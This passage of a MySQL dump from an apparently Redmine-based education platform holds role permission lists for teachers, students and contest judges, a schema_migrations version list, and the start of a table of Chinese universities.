:notificationcomment_contestnotifications\n- :manage_boards\n- :add_messages\n- :edit_own_messages\n- :delete_own_messages\n- :view_calendar\n- :manage_files\n- :view_files\n- :view_gantt\n- :manage_categories\n- :view_issues\n- :add_issues\n- :edit_issues\n- :manage_issue_relations\n- :manage_subtasks\n- :set_issues_private\n- :set_own_issues_private\n- :add_issue_notes\n- :edit_issue_notes\n- :edit_own_issue_notes\n- :view_private_notes\n- :set_notes_private\n- :move_issues\n- :delete_issues\n- :manage_public_queries\n- :save_queries\n- :view_issue_watchers\n- :add_issue_watchers\n- :delete_issue_watchers\n- :manage_repository\n- :browse_repository\n- :view_changesets\n- :commit_access\n- :manage_related_issues\n','all'),(5,'Reporter',4,1,0,'---\n- :add_project\n- :projects_attachments_download\n- :add_course\n- :edit_course\n- :close_course\n- :select_course_modules\n- :view_course_journals_for_messages\n- :course_attachments_download\n- :view_course_files\n- :view_homework_attaches\n- :manage_boards\n- :add_messages\n- :edit_own_messages\n- :delete_own_messages\n- :view_calendar\n- :view_code_review\n- :manage_files\n- :view_files\n- :view_gantt\n- :view_issues\n- :add_issues\n- :edit_issues\n- :add_issue_notes\n- :edit_own_issue_notes\n- :save_queries\n- :comment_news\n- :browse_repository\n- :view_wiki_pages\n- :export_wiki_pages\n- :view_wiki_edits\n- :edit_wiki_pages\n- :delete_wiki_pages_attachments\n','all'),(7,'TeachingAsistant',6,1,0,'---\n- :add_project\n- :edit_project\n- :manage_members\n- :projects_attachments_download\n- :as_teacher\n- :add_course\n- :edit_course\n- :close_course\n- :select_course_modules\n- :view_course_journals_for_messages\n- :course_attachments_download\n- :view_course_files\n- :view_homework_attaches\n- :manage_boards\n- :add_messages\n- :edit_own_messages\n- :delete_messages\n- :delete_own_messages\n- :view_calendar\n- :view_documents\n- :manage_files\n- :view_files\n- :view_gantt\n- :view_issues\n- :add_issues\n- :add_issue_notes\n- :save_queries\n- :manage_news\n- :comment_news\n- :browse_repository\n- :view_changesets\n- :view_time_entries\n- :view_wiki_pages\n- :export_wiki_pages\n- :view_wiki_edits\n- :edit_wiki_pages\n- :delete_wiki_pages_attachments\n','default'),(9,'Teacher',7,1,0,'---\n- :upload_attachments\n- :memos_attachments_download\n- :add_project\n- :edit_project\n- :close_project\n- :select_project_modules\n- :manage_members\n- :manage_versions\n- :add_subprojects\n- :projects_attachments_download\n- :as_teacher\n- :add_course\n- :edit_course\n- :close_course\n- :select_course_modules\n- :view_course_journals_for_messages\n- :course_attachments_download\n- :view_course_files\n- :view_homework_attaches\n- :manage_boards\n- :add_messages\n- :edit_messages\n- :edit_own_messages\n- :delete_messages\n- :delete_own_messages\n- :view_calendar\n- :add_documents\n- :edit_documents\n- :delete_documents\n- :view_documents\n- :manage_files\n- :view_files\n- :view_gantt\n- :manage_categories\n- :view_issues\n- :add_issues\n- :edit_issues\n- :manage_issue_relations\n- :manage_subtasks\n- :set_issues_private\n- :set_own_issues_private\n- :add_issue_notes\n- :edit_own_issue_notes\n- :view_private_notes\n- :set_notes_private\n- :move_issues\n- :delete_issues\n- :manage_public_queries\n- :save_queries\n- :view_issue_watchers\n- :add_issue_watchers\n- :delete_issue_watchers\n- :manage_news\n- :comment_news\n- :manage_repository\n- :browse_repository\n- :view_changesets\n- :commit_access\n- :manage_related_issues\n- :log_time\n- :view_time_entries\n- :edit_time_entries\n- :edit_own_time_entries\n- :manage_project_activities\n- :manage_wiki\n- :rename_wiki_pages\n- :delete_wiki_pages\n- :view_wiki_pages\n- :export_wiki_pages\n- :view_wiki_edits\n- :edit_wiki_pages\n- :delete_wiki_pages_attachments\n- :protect_wiki_pages\n','default'),(10,'Student',9,1,0,'---\n- :add_project\n- :projects_attachments_download\n- :as_student\n- :add_course\n- :edit_course\n- :close_course\n- :select_course_modules\n- :view_course_journals_for_messages\n- :course_attachments_download\n- :view_course_files\n- :view_homework_attaches\n- :paret_in_homework\n- :manage_boards\n- :add_messages\n- :edit_own_messages\n- :delete_own_messages\n- :view_calendar\n- :view_documents\n- :manage_files\n- :view_files\n- :view_gantt\n- :view_issues\n- :add_issues\n- :add_issue_notes\n- :save_queries\n- :comment_news\n- :browse_repository\n- :view_changesets\n- :view_time_entries\n- :view_wiki_pages\n- :view_wiki_edits\n','default'),(11,'orgManager',8,1,0,'---\n- :add_project\n- :projects_attachments_download\n- :add_course\n- :course_attachments_download\n- :view_course_files\n- :add_messages\n- :delete_own_messages\n- :view_calendar\n- :view_documents\n- :view_files\n- :view_gantt\n- :view_issues\n- :save_queries\n- :comment_news\n- :browse_repository\n- :view_changesets\n- :view_time_entries\n- :view_wiki_pages\n- :view_wiki_edits\n','default'),(12,'orgMember',10,1,0,'---\n- :add_project\n- :projects_attachments_download\n- :add_course\n- :course_attachments_download\n- :view_course_files\n- :add_messages\n- :delete_own_messages\n- :view_calendar\n- :view_documents\n- :view_files\n- :view_gantt\n- :view_issues\n- :save_queries\n- :comment_news\n- :browse_repository\n- :view_changesets\n- :view_time_entries\n- :view_wiki_pages\n- :view_wiki_edits\n','default'),(13,'ContestManager',11,1,0,'---\n- :add_project\n- :projects_attachments_download\n- :add_course\n- :course_attachments_download\n- :view_course_files\n- :select_contest_modules\n- :quote_project\n- :contest_attachments_download\n- :manage_contestnotifications\n- :notificationcomment_contestnotifications\n- :manage_boards\n- :add_messages\n- :edit_messages\n- :edit_own_messages\n- :delete_messages\n- :delete_own_messages\n- :view_calendar\n- :view_files\n- :view_gantt\n- :view_issues\n- :save_queries\n- :browse_repository\n- :view_changesets\n','default'),(14,'Judge',12,1,0,'---\n- :add_project\n- :projects_attachments_download\n- :add_course\n- :course_attachments_download\n- :view_course_files\n- :select_contest_modules\n- :quote_project\n- :contest_attachments_download\n- :manage_contestnotifications\n- :notificationcomment_contestnotifications\n- :manage_boards\n- :add_messages\n- :edit_messages\n- :edit_own_messages\n- :delete_own_messages\n- :view_calendar\n- :manage_files\n- :view_files\n- :view_gantt\n- :view_issues\n- :save_queries\n- :browse_repository\n- :view_changesets\n','default'),(15,'Contestant',13,1,0,'---\n- :add_project\n- :projects_attachments_download\n- :add_course\n- :course_attachments_download\n- :view_course_files\n- :select_contest_modules\n- :quote_project\n- :contest_attachments_download\n- :notificationcomment_contestnotifications\n- :add_messages\n- :edit_own_messages\n- :delete_own_messages\n- :view_calendar\n- :manage_files\n- :view_files\n- :view_gantt\n- :view_issues\n- :save_queries\n- :browse_repository\n- :view_changesets\n','default');
|
||
/*!40000 ALTER TABLE `roles` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `schema_migrations`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `schema_migrations`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `schema_migrations` (
|
||
`version` varchar(255) NOT NULL,
|
||
UNIQUE KEY `unique_schema_migrations` (`version`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `schema_migrations`
|
||
--
|
||
|
||
LOCK TABLES `schema_migrations` WRITE;
|
||
/*!40000 ALTER TABLE `schema_migrations` DISABLE KEYS */;
|
||
INSERT INTO `schema_migrations` VALUES ('1'),('10'),('100'),('101'),('102'),('103'),('104'),('105'),('106'),('107'),('108'),('11'),('12'),('13'),('14'),('15'),('16'),('17'),('18'),('19'),('2'),('20'),('20090214190337'),('20090312172426'),('20090312194159'),('20090318181151'),('20090323224724'),('20090401221305'),('20090401231134'),('20090403001910'),('20090406161854'),('20090425161243'),('20090503121501'),('20090503121505'),('20090503121510'),('20090614091200'),('20090704172350'),('20090704172358'),('20091010093521'),('20091017212227'),('20091017212457'),('20091017212644'),('20091017212938'),('20091017213027'),('20091017213113'),('20091017213151'),('20091017213228'),('20091017213257'),('20091017213332'),('20091017213444'),('20091017213536'),('20091017213642'),('20091017213716'),('20091017213757'),('20091017213835'),('20091017213910'),('20091017214015'),('20091017214107'),('20091017214136'),('20091017214236'),('20091017214308'),('20091017214336'),('20091017214406'),('20091017214440'),('20091017214519'),('20091017214611'),('20091017214644'),('20091017214720'),('20091017214750'),('20091025163651'),('20091108092559'),('20091114105931'),('20091123212029'),('20091205124427'),('20091220183509'),('20091220183727'),('20091220184736'),('20091225164732'),('20091227112908'),('20100129193402'),('20100129193813'),('20100221100219'),('20100313132032'),('20100313171051'),('20100705164950'),('20100819172912'),('20101104182107'),('20101107130441'),('20101114115114'),('20101114115359'),('20110220160626'),('20110223180944'),('20110223180953'),('20110224000000'),('20110226120112'),('20110226120132'),('20110227125750'),('20110228000000'),('20110228000100'),('20110401192910'),('20110408103312'),('20110412065600'),('20110511000000'),('20110902000000'),('20111201201315'),('20120115143024'),('20120115143100'),('20120115143126'),('20120127174243'),('20120205111326'),('20120223110929'),('20120301153455'),('20120422150750'),('20120705074331'),('20120707064544'),('20120714122000'),('20120714122100'),('20120714122200'),('20120731164049'),('20120930112914'),('20121026002032'),('20121026003537'),('20121209123234'),('20121209123358'),('20121213084931'),('20130110122628'),('20130201184705'),('20130202090625'),('20130207175206'),('20130207181455'),('20130215073721'),('20130215111127'),('20130215111141'),('20130217094251'),('20130725021433'),('20130727021306'),('20130801081314'),('20130806072429'),('20130807021235'),('20130807021309'),('20130807031901'),('20130809122945'),('20130810014337'),('20130810085341'),('20130811001727'),('20130811122119'),('20130814084938'),('20130823133435'),('20130823143552'),('20130827003308'),('20130828004955'),('20130828080407'),('20130911135608'),('20130911140019'),('20130911140205'),('20130918004629'),('20130918085747'),('20130922123727'),('20130922123849'),('20130925031313'),('20130926140427'),('20131009074454'),('20131017080750'),('20131017120541'),('20131017131615'),('20131017135933'),('20131017140104'),('20131017140123'),('20131021024144'),('20131107073302'),('20131108133857'),('20131112005309'),('20131122020026'),('20131122132942'),('20131215065910'),('20131224021723'),('20140320015156'),('20140324015819'),('20140401004102'),('20140403075029'),('20140403113341'),('20140404030103'),('20140404031622'),('20140410015850'),('20140410020848'),('20140410021724'),('20140411005214'),('20140413022725'),('20140414012423'),('20140417091429'),('20140421044829'),('20140421044830'),('20140424072458'),('20140428005537'),('20140428013546'),('20140505083218'),('20140508030039'),('20140508030358'),('20140509020307'),('20140513073801'),('20140515013449'),('20140516031200'),('20140519020211'),('20140519030825'),('20140519074133'),('20140521072851'),('20140522025137'),('20140522025721'),('20140526031949'),('20140526104509'),('20140527060344'),('20140609061903'),('20140617013146'),('20140701075839'),('20140707095213'),('20140710024054'),('20140710030426'),('20140710071720'),('20140710095123'),('20140711010124'),('20140711012924'),('20140714021812'),('20140714081030'),('20140715015540'),('20140716021202'),('20140716021558'),('20140718091306'),('20140719030741'),('20140719030941'),('20140719080032'),('20140721074353'),('20140723082637'),('20140724080319'),('20140725013735'),('20140725062302'),('20140725073357'),('20140728014933'),('20140730021521'),('20140801034242'),('20140811022947'),('20140814062455'),('20140826072838'),('20140916005319'),('20141013014908'),('20141013023400'),('20141103015148'),('20141103032156'),('20141103065703'),('20141120091234'),('20141127015431'),('20141127072548'),('20141201085218'),('20141210070327'),('20141229025519'),('20150121030451'),('20150128032421'),('20150206023634'),('20150206060632'),('20150210062236'),('20150227061944'),('20150227065713'),('20150227083257'),('20150227085333'),('20150302061232'),('20150302091345'),('20150305081132'),('20150309090143'),('20150311013036'),('20150316083717'),('20150318025244'),('20150324021043'),('20150328115230'),('20150331031554'),('20150331032810'),('20150402015402'),('20150409092151'),('20150414115406'),('20150415032102'),('20150428021035'),('20150510100343'),('20150514133640'),('20150528024616'),('20150602055730'),('20150604153000'),('20150712063406'),('20150713161100'),('20150714161100'),('20150714162200'),('20150715162300'),('20150719092427'),('20150810064247'),('20150811083322'),('20150819090720'),('20150820004659'),('20150820022416'),('20150820025358'),('20150824133916'),('20150901004910'),('20150906025009'),('20150906065702'),('20150906083453'),('20150906090419'),('20150906091723'),('20150907064144'),('20150907064547'),('20150909062619'),('20150911064528'),('20150914063751'),('20150915063302'),('20150917071652'),('20150917081214'),('20150918134804'),('20150924063215'),('20150928090128'),('20150930011457'),('20151013023237'),('20151013081912'),('20151013091057'),('20151013092356'),('20151014012627'),('20151014013243'),('20151014023806'),('20151109073857'),('20151109080256'),('20151112072948'),('20151203030635'),('20151203072815'),('20151204062220'),('20151216025539'),('20151216030610'),('20151217051447'),('20151218022014'),('20151218110033'),('20151224090313'),('20151229022049'),('20151229045505'),('20151230022443'),('20160104082423'),('20160105073350'),('20160106065255'),('20160108021447'),('20160111064927'),('20160111065137'),('20160111065215'),('20160111065530'),('20160111071348'),('20160111071411'),('20160111071529'),('20160111071558'),('20160111080833'),('20160111080914'),('20160113023045'),('20160113023137'),('20160113024927'),('20160113063514'),('20160113064153'),('20160113090435'),('20160114022833'),('20160114022928'),('20160114131753'),('20160115023749'),('20160115125217'),('20160118083751'),('20160122023014'),('20160126024429'),('20160222064143'),('20160223073859'),('20160224032046'),('20160311072540'),('20160311072622'),('20160316055201'),('20160317090350'),('20160321071740'),('20160321073107'),('20160321073227'),('20160321075815'),('20160321080116'),('20160321080336'),('20160321080412'),('20160321085313'),('20160324052634'),('20160324074942'),('20160325030423'),('20160414060838'),('20160415025623'),('20160415030447'),('20160504060751'),('20160519070718'),('20160601073753'),('20160622033322'),('20160622074138'),('20160624054614'),('20160624055127'),('20160627090316'),('20160629030320'),('20160629081520'),('20160707031248'),('20160719013955'),('20160720094503'),('20160721075236'),('20160725062343'),('20160725091759'),('20160727020247'),('20160727065357'),('20160728041513'),('20160728041943'),('20160728075947'),('20160729020903'),('20160729124038'),('20160729124833'),('20160810081337'),('20160824073554'),('20160830090214'),('20160914073340'),('20160918024214'),('20160918033136'),('20160918074635'),('20160923024443'),('20161009053958'),('20161011012114'),('20161014085016'),('20161015013348'),('20161028053000'),('20161111064007'),('20161111071624'),('20161115082005'),('20161121091826'),('20161128072528'),('20161129033440'),('20161130031415'),('20161201015458'),('20161202073523'),('20161213074134'),('20161222033007'),('20161223025155'),('20161223030701'),('20170117161330'),('20170120120614'),('20170207060207'),('20170217004513'),('20170217092541'),('20170217092859'),('20170219025424'),('20170219062646'),('20170219070127'),('20170303030731'),('20170321081658'),('20170322095511'),('20170405075018'),('20170410085204'),('20170410085945'),('20170410092257'),('20170419070551'),('20170502091943'),('20170503062237'),('20170503062507'),('20170503075321'),('20170503085743'),('20170508081347'),('20170526022745'),('20170526023023'),('20170526090359'),('20170607015139'),('20170607021803'),('20170626031135'),('20170626055814'),('20170718022342'),('20170720013004'),('20170728082516'),('20170802012507'),('20170810012934'),('20170822080604'),('20170831015104'),('20170831022201'),('20170926012936'),('20170930122738'),('20171011084944'),('20171012073054'),('20171013081923'),('20171013083722'),('20171014070618'),('20171014074021'),('20171023115525'),('20171108032131'),('20171213064646'),('20171214021853'),('20171214023018'),('20171214025420'),('20171214085019'),('20171215010708'),('20171221074055'),('20171222075831'),('20171226065503'),('20171226075551'),('20171227065103'),('20180119083918'),('20180131064555'),('20180202063413'),('20180206083254'),('20180316065917'),('20180328074357'),('20180330025749'),('20180403082849'),('20180416070001'),('20180416073019'),('20180418065309'),('20180517032433'),('20180517074054'),('20180521030537'),('20180522042604'),('20180524072611'),('20180601080626'),('20180607022655'),('20180612092939'),('20180613071648'),('20180625080716'),('20180627092727'),('20180705110210'),('20180708085859'),('20180712012858'),('20180712022703'),('20180725082959'),('20180731021806'),('20180801061611'),('20180801062536'),('20180816013230'),('20180816021006'),('20180816082149'),('20180817031933'),('20180817075000'),('20180824014418'),('20190117030834'),('20190117122242'),('20190709021117'),('20190709032317'),('20190709062129'),('20190709062404'),('20190710032945'),('20190710033614'),('20190710053721'),('20190710063021'),('20190710064103'),('20190710065635'),('20190710065724'),('20190710065942'),('20190710071001'),('20190710073408'),('20190710074610'),('20190710080238'),('20190710090750'),('20190710093045'),('20190710093106'),('20190710094005'),('20190710094633'),('20190710095341'),('20190711093636'),('20190711093638'),('20190711093728'),('20190711093738'),('20190711093748'),('20190711093758'),('20190711093768'),('20190711093778'),('20190711093788'),('20190711093798'),('20190711093801'),('20190711093811'),('20190711093821'),('20190711093831'),('20190711093833'),('20190715084935'),('20190715085001'),('20190715085002'),('20190715085003'),('20190715085004'),('20190715085005'),('20190715085006'),('20190715085007'),('20190715085008'),('20190715085009'),('20190715085010'),('20190715085011'),('20190722101138'),('20190725075600'),('20190726062357'),('20190726064044'),('20190726092122'),('20190726104121'),('20190727023800'),('20190729010503'),('20190730090324'),('20190730091824'),('20190730092825'),('20190731024338'),('20190801133650'),('20190802082111'),('20190803090911'),('20190803091448'),('20190805064537'),('20190805100938'),('20190810013527'),('20190810025129'),('20190814075912'),('20190814080121'),('20190814080439'),('20190826031102'),('20190918010521'),('20190918010551'),('20190918063702'),('20190919032931'),('20190920011010'),('20190920013211'),('20190920013228'),('20190920014122'),('20190920022345'),('20190920022702'),('20190920022938'),('20190920081957'),('20190921081104'),('20190921081614'),('20190921082636'),('20190921083935'),('20190923043816'),('20190923062420'),('20190923072830'),('20190923081318'),('20190923082707'),('20190924065045'),('20190924075519'),('20190926053919'),('20190926054822'),('20190928093127'),('20190929030004'),('20191018094101'),('20191029030759'),('20191029104712'),('20191030085117'),('20191107013305'),('20191107021519'),('20191107084639'),('20191107085057'),('20191111091642'),('20191112022535'),('20191112032544'),('20191112120958'),('20191114055216'),('20191114094154'),('20191115072206'),('20191115073616'),('20191115082147'),('20191119055242'),('20191119091540'),('20191120081051'),('20191121005750'),('20191121010118'),('20191121020513'),('20191121034315'),('20191203013008'),('20191210060641'),('20191212110933'),('20191213091840'),('20191218015959'),('20191218022602'),('20191218023731'),('20191218024615'),('20191218092812'),('20191218105120'),('20191220085002'),('20191220085133'),('20191220085352'),('20191220092618'),('20191223031855'),('20191223063139'),('20191224060807'),('20191224064403'),('20191225073843'),('20191225125634'),('20191227013202'),('20191227084951'),('20191227090611'),('20191227105755'),('20191227140150'),('20191227162744'),('20200103062707'),('20200103062807'),('20200103113839'),('20200106022157'),('20200106022235'),('20200106082806'),('20200106093141'),('20200108015358'),('20200108025756'),('20200108031646'),('20200108071622'),('20200108082955'),('20200117032213'),('20200210071320'),('20200210074241'),('20200210111249'),('20200210111308'),('20200212055807'),('20200213090203'),('20200213094050'),('20200220063545'),('20200220075242'),('20200317160914'),('20200416154625'),('20200417094626'),('20200421092002'),('20200429085544'),('20200513080857'),('20200515024117'),('20200515080705'),('20200515082628'),('20200518065521'),('20200518081445'),('20200518090640'),('20200518092612'),('20200521090205'),('20200521093338'),('20200525021613'),('20200525054200'),('20200609100407'),('20200610071625'),('20200629020618'),('20200629081111'),('20200708114354'),('20200709061656'),('20200710124116'),('20200713150706'),('20200714014513'),('20200714032759'),('20200714072948'),('20200714112206'),('20200715075831'),('20200715152711'),('20200716060536'),('20200717015216'),('20200723102334'),('20200724020540'),('20200724020730'),('20200724023007'),('20200724033455'),('20200724054554'),('20200724055939'),('20200724081738'),('20200724082726'),('20200724094922'),('20200727063530'),('20200727085840'),('20200731073851'),('20200807103037'),('20200812092545'),('20200813144941'),('20200813150315'),('20200818100044'),('20200818101224'),('20200818104706'),('20200819024930'),('20200819024949'),('20200819034734'),('20200819062753'),('20200819092027'),('20200819100142'),('20200828021007'),('20200828022021'),('20200904074907'),('20200918070207'),('20200925090122'),('20200927031620'),('20200929062837'),('20201004034434'),('20201004070431'),('20201019082617'),('20201019104433'),('20201020071758'),('20201020083709'),('20201020093834'),('20201021031915'),('20201021033117'),('20201021041202'),('20201021070524'),('20201021080638'),('20201022164823'),('20201023025821'),('20201104034658'),('20201130081039'),('20201225064324'),('20201225065222'),('20201230054355'),('20210108015318'),('20210108055023'),('20210108062016'),('20210111013512'),('20210111065934'),('20210111065954'),('20210111093008'),('20210111093016'),('20210111093024'),('20210111093200'),('20210112053516'),('20210118011710'),('20210119025745'),('20210120081821'),('20210122052755'),('20210126071814'),('20210202034128'),('20210202100517'),('20210310012914'),('21'),('22'),('23'),('24'),('25'),('26'),('27'),('28'),('29'),('3'),('30'),('31'),('32'),('33'),('34'),('35'),('36'),('37'),('38'),('39'),('4'),('40'),('41'),('42'),('43'),('44'),('45'),('46'),('47'),('48'),('49'),('5'),('50'),('51'),('52'),('53'),('54'),('55'),('56'),('57'),('58'),('59'),('6'),('60'),('61'),('62'),('63'),('64'),('65'),('66'),('67'),('68'),('69'),('7'),('70'),('71'),('72'),('73'),('74'),('75'),('76'),('77'),('78'),('79'),('8'),('80'),('81'),('82'),('83'),('84'),('85'),('86'),('87'),('88'),('89'),('9'),('90'),('91'),('92'),('93'),('94'),('95'),('96'),('97'),('98'),('99');
|
||
/*!40000 ALTER TABLE `schema_migrations` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `schools`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `schools`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `schools` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`name` varchar(255) DEFAULT NULL,
|
||
`province` varchar(255) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`logo_link` varchar(255) DEFAULT NULL,
|
||
`pinyin` varchar(255) DEFAULT NULL,
|
||
`school_type` int(11) DEFAULT '0',
|
||
`city` varchar(255) DEFAULT NULL,
|
||
`address` varchar(255) DEFAULT NULL,
|
||
`auto_users_trial` tinyint(1) DEFAULT '0',
|
||
`shool_code` varchar(255) DEFAULT NULL,
|
||
`authorization_time` datetime DEFAULT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=3163 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `schools`
|
||
--
|
||
|
||
LOCK TABLES `schools` WRITE;
|
||
/*!40000 ALTER TABLE `schools` DISABLE KEYS */;
|
||
INSERT INTO `schools` VALUES (117,'国防科技大学','湖南','2014-04-23 00:00:00','2017-10-13 22:14:09','/images/school/117.gif','guofangkexuejishudaxue',0,'长沙','湖南省长沙市开福区福元路',1,NULL,'2018-01-01 10:00:00'),(118,'北京大学','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijingdaxue',0,NULL,NULL,0,NULL,NULL),(119,'中国人民大学','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','zhongguorenmindaxue',0,NULL,NULL,0,NULL,NULL),(120,'清华大学','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/120.png','qinghuadaxue',0,NULL,NULL,0,NULL,NULL),(121,'北京交通大学','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijingjiaotongdaxue',0,NULL,NULL,0,NULL,NULL),(122,'北京科技大学','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijingkejidaxue',0,NULL,NULL,0,NULL,NULL),(123,'北京化工大学','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijinghuagongdaxue',0,NULL,NULL,0,NULL,NULL),(124,'北京邮电大学','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijingyoudiandaxue',0,NULL,NULL,0,NULL,NULL),(125,'中国农业大学','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','zhongguonongyedaxue',0,NULL,NULL,0,NULL,NULL),(126,'北京林业大学','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijinglinyedaxue',0,NULL,NULL,0,NULL,NULL),(127,'北京中医药大学','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijingzhongyiyaodaxue',0,NULL,NULL,0,NULL,NULL),(128,'北京师范大学','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijingshifandaxue',0,NULL,NULL,0,NULL,NULL),(129,'北京外国语大学','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijingwaiguoyudaxue',0,NULL,NULL,0,NULL,NULL),(130,'北京语言大学','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijingyuyandaxue',0,NULL,NULL,0,NULL,NULL),(131,'中央财经大学','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','zhongyangcaijingdaxue',0,NULL,NULL,0,NULL,NULL),(132,'对外经济贸易大学','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','duiwaijingjimaoyidaxue',0,NULL,NULL,0,NULL,NULL),(133,'中国政法大学','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','zhongguozhengfadaxue',0,NULL,NULL,0,NULL,NULL),(134,'华北电力大学','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','huabeidianlidaxue',0,NULL,NULL,0,NULL,NULL),(135,'中国石油大学','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','zhongguoshiyoudaxue',0,NULL,NULL,0,NULL,NULL),(136,'中央民族大学','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','zhongyangminzudaxue',0,NULL,NULL,0,NULL,NULL),(137,'中国人民公安大学','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','zhongguorenmingongandaxue',0,NULL,NULL,0,NULL,NULL),(138,'北京协和医学院','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijingxieheyixueyuan',0,NULL,NULL,0,NULL,NULL),(139,'北京体育大学','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijingtiyudaxue',0,NULL,NULL,0,NULL,NULL),(140,'北京航空航天大学','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/140.png','beijinghangkonghangtiandaxue',0,NULL,NULL,0,NULL,NULL),(141,'北京理工大学','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijingligongdaxue',0,NULL,NULL,0,NULL,NULL),(142,'中国科学院大学','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','zhongguokexueyuandaxue',0,NULL,NULL,1,NULL,'2018-01-01 10:00:00'),(143,'北京工业大学','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijinggongyedaxue',0,NULL,NULL,0,NULL,NULL),(144,'北方工业大学','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beifanggongyedaxue',0,NULL,NULL,0,NULL,NULL),(145,'北京工商大学','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijinggongshangdaxue',0,NULL,NULL,0,NULL,NULL),(146,'北京建筑大学','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijingjianzhudaxue',0,NULL,NULL,0,NULL,NULL),(147,'首都医科大学','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','shouduyikedaxue',0,NULL,NULL,0,NULL,NULL),(148,'首都师范大学','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','shoudushifandaxue',0,NULL,NULL,0,NULL,NULL),(149,'首都经济贸易大学','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','shoudujingjimaoyidaxue',0,NULL,NULL,0,NULL,NULL),(150,'北京信息科技大学','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijingxinxikejidaxue',0,NULL,NULL,0,NULL,NULL),(151,'北京联合大学','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijinglianhedaxue',0,NULL,NULL,0,NULL,NULL),(152,'中国传媒大学','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','zhongguochuanmeidaxue',0,NULL,NULL,0,NULL,NULL),(153,'国际关系学院','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','guojiguanxixueyuan',0,NULL,NULL,0,NULL,NULL),(154,'中央音乐学院','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','zhongyangyinlexueyuan',0,NULL,NULL,0,NULL,NULL),(155,'中央美术学院','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','zhongyangmeishuxueyuan',0,NULL,NULL,0,NULL,NULL),(156,'中央戏剧学院','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','zhongyangxijuxueyuan',0,NULL,NULL,0,NULL,NULL),(157,'北京电子科技学院','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','beijingdianzikejixueyuan',0,NULL,NULL,0,NULL,NULL),(158,'外交学院','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','waijiaoxueyuan',0,NULL,NULL,0,NULL,NULL),(159,'中国劳动关系学院','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','zhongguolaodongguanxixueyuan',0,NULL,NULL,0,NULL,NULL),(160,'中国青年政治学院','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','zhongguoqingnianzhengzhixueyuan',0,NULL,NULL,0,NULL,NULL),(161,'中华女子学院','北京市','2014-04-23 00:00:00','2015-10-16 17:40:33','/images/school/default.png','zhonghuanvzixueyuan',0,NULL,NULL,0,NULL,NULL),(162,'北京服装学院','北京市','2014-04-23 00:00:00','2015-10-16 